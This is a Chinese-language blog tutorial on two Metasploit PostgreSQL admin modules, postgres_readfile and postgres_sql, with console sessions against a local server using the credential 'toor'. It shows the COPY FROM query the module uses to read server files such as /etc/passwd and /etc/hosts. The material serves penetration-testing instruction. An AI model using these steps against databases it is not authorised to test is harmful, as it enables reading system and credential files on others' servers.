Metasploit 辅助模块:Admin Postgres

postgres_readfile

该“postgres_readfile”模块,当与一个PostgreSQL服务器有效凭据提供,将读取并显示服务器上你所选择的文件。

msf > use auxiliary/admin/postgres/postgres_readfile 
msf auxiliary(postgres_readfile) > show options

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

 

为了配置模块,我们设置了PASSWORD和RHOST值,将RFILE设置为我们希望读取的文件并让模块运行。

msf auxiliary(postgres_readfile) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(postgres_readfile) > set RFILE /etc/hosts 
RFILE => /etc/hosts
msf auxiliary(postgres_readfile) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(postgres_readfile) > run

Query Text: 'CREATE TEMP TABLE UnprtSRXpcuMpN (INPUT TEXT);
			COPY UnprtSRXpcuMpN FROM '/etc/hosts';
			SELECT * FROM UnprtSRXpcuMpN'
======================================================================================================================================

    input
    -----
    127.0.0.1       localhost
    127.0.1.1       ph33r
    
    # The following lines are desirable for IPv6 capable hosts
    ::1     ip6-localhost ip6-loopback
    fe00::0 ip6-localnet
    ff00::0 ip6-mcastprefix
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    ff02::3 ip6-allhosts

[*] Auxiliary module execution completed
msf auxiliary(postgres_readfile) >

postgres_readfile

 

postgres_sql

当提供PostgreSQL服务器的有效凭证时,“postgres_sql”模块将执行您选择的查询并返回结果。

msf > use auxiliary/admin/postgres/postgres_sql
msf auxiliary(postgres_sql) > show options

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD                         no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOST                            yes       The target address
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output

 

 

这个模块所需的配置是最小的,因为我们将设置我们的PASSWORD和RHOST值,保留默认查询来拉取服务器版本,然后让它对我们的目标运行。

msf auxiliary(postgres_sql) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(postgres_sql) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(postgres_sql) > run

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL 8.3.8 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.2-1ubuntu11) 4.3.2

[*] Auxiliary module execution completed
msf auxiliary(postgres_sql) >

admin/postgres/postgres_sql

    A+
发布日期:2018年06月14日 19:17:34  所属分类:Metasploit
最后更新时间:2018-06-14 19:17:34
付杰
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
购买
详情
Python爬虫教程:零基础上手Scrapy分布爬虫
  • ¥ 388.0元
  • 市场价:388.0元
购买
详情
iOS应用开发指南第5季:界面布局与屏幕适配
  • ¥ 89.0元
  • 市场价:129.0元
购买
详情
Kubernetes/K8S企业运维入门进阶实战
  • ¥ 298.0元
  • 市场价:498.0元
购买
详情

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: